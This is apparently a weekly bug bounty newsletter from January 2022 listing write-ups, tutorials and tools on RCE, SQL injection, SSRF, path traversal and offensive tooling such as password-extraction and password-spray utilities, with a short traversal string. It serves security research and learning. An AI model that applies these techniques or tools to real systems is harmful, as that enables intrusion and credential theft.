By Anna Hammond
January 26, 2022
Bug Bytes is a weekly newsletter curated by members of the bug bounty community. The first series is curated by Mariem, better known as PentesterLand. Every week, she keeps us up to date with a comprehensive list of write-ups, tools, tutorials and resources.
This issue covers the week from January 17 to 24, 2022.
New responsible disclosure program
European Commission’s Open Source Programme Office starts bug bounties
Python NaN Injection, Repo & Decipher Podcast: Robert Hansen Returns
It’s strange that this new Python vulnerability class went unnoticed. It may be complex and difficult to identify but it is also novel and an interesting area to explore.
For the anecdote, Robert Hansen / @RSnake is one of the first hackers I followed when I started in 2012. Among other things, he created the old ha.ckers.org XSS Cheat Sheet on which the OWASP XSS Filter Evasion Cheat Sheet was based.
Hacking the Apple Webcam (again) (Apple, $100,500)
CVE-2021-45467: CWP CentOS Web Panel – preauth RCE
The Tale of a Click leading to RCE
Ryan Pickren discovered a UXSS and other issues on Safari that could give an attacker access to victims’ camera and any website they visited, bypassing Gatekeeper.
@0xLupin‘s writeup is an amazing red teaming story that demonstrates how SSRF can be upgraded to RCE in a real-world (but CTF-like) scenario.
The third writeup is about a curious RCE via local file write on CentOS Web Panel.
In @PaulosYibelo‘s words, .%00./
is the new ..;/
.
Creating easy proof-of-concept scripts with Python and Curl.
Debugging a Java application with decompiled source code
The first tutorial shows how to use curl.se/h2c/ and curl.trillworks.com to easily convert HTTP requests (e.g. copied from Burp) to curl commands, and curl commands to Python or other languages (PHP, JavaScript, Go, Rust, JSON and many others).
It can be handy if you are short on time or struggle with creating custom scripts/curl commands.
The second tutorial is about dynamic analysis of Java apps using IntelliJ IDEA. If you perform static analysis of Java apps and find it difficult to trace sinks and sources, this debugging method by @dozernz can make the process much easier.
Free SQL injection section of Bug Bounty – An Advanced Guide to Finding Good Bugs
@HusseiN98D gave an advanced bug bounty workshop at THREAT CON and published the recording on Udemy.
It is not free ($49.99 until the end of the week, then $139.99) but the SQL injection section is. It is more than one hour on SQL injection with a couple of advanced bug bounty use cases that may teach you some useful tricks.
Note that it is extremely rare for me to feature paid content in this newsletter. The only reason I am making this exception is its quality and the juicy hour long free video it includes.
A tip for exploiting tricky blind SQL injections
If you find a blind SQL injection and have a hard time exfiltrating data, try @mcipekci‘s technique (adapted to your context of course) to force the app to return an error.
Finding security vulnerabilities with GitHub’s new code search
Web App Penetration Testing – Course Introduction & Introduction To HTTP
Injecting code into any Homebrew Cask by attacking GitHub Actions script
Demystifying JA3: One Handshake at a Time & Other ways a site can block Burp traffic
Vulnerable AWS Lambda function – Initial access in cloud attacks
A Beginner’s guide into Router Hacking and Firmware Emulation
Solarwinds Web Help Desk: When the Helpdesk is too Helpful #Web #CodeReview
Blind Server-Side Request Forgery & Unsafe Object Deserialization in Html2Pdf <= 5.2.3 #Web #CodeReview
Cisco Prime 3.9.1 – RCE #Web #SNMP
Paranoids’ Vulnerability Research: PrinterLogic Issues Security Alert #Printer
ZohOwned :: A Critical Authentication Bypass on Zoho ManageEngine Desktop Central (Zoho)
The Cat Escaped from the Chrome Sandbox #Browser #MemoryCorruption
Finding vulnerabilities in Swiss Post’s future e-voting system – Part 1 (Swiss Post)
CVE-2022-21661: Exposing Database Info Via WordPress SQL Injection (WordPress)
See more writeups on The list of bug bounty writeups.
ripgen: Rust-based high performance domain permutation generator
ShadowClone: Allows you to distribute your long running tasks dynamically across thousands of serverless functions
jo: JSON output from a shell
Chrome Bandit: Programmatically extract saved passwords from Google Chrome
TREVORproxy, TREVORspray 2.0 & Intro: Increasing the speed and effectiveness of password sprays
New InternetDB API by Shodan that lets you do fast IP lookups for free without an API key
HOUDINI: Hundreds of Offensive and Useful Docker Images for Network Intrusion
Captain Hook – How (Not) To Look For Vulnerabilities In Java Applications
The best free, open-source supply-chain security tool? The lockfile
SeeYouCM-Thief: Exploiting Common Misconfigurations In Cisco Phone Systems & SeeYouCM Thief
Bug bounty
Cybersecurity
Jobs
Upcoming events
IWCon 2022 (February 26-27)
Bounty Hunters Hackathon (Deadline is February 20)
HTB giveaway (January 24 to February 4)
Tool updates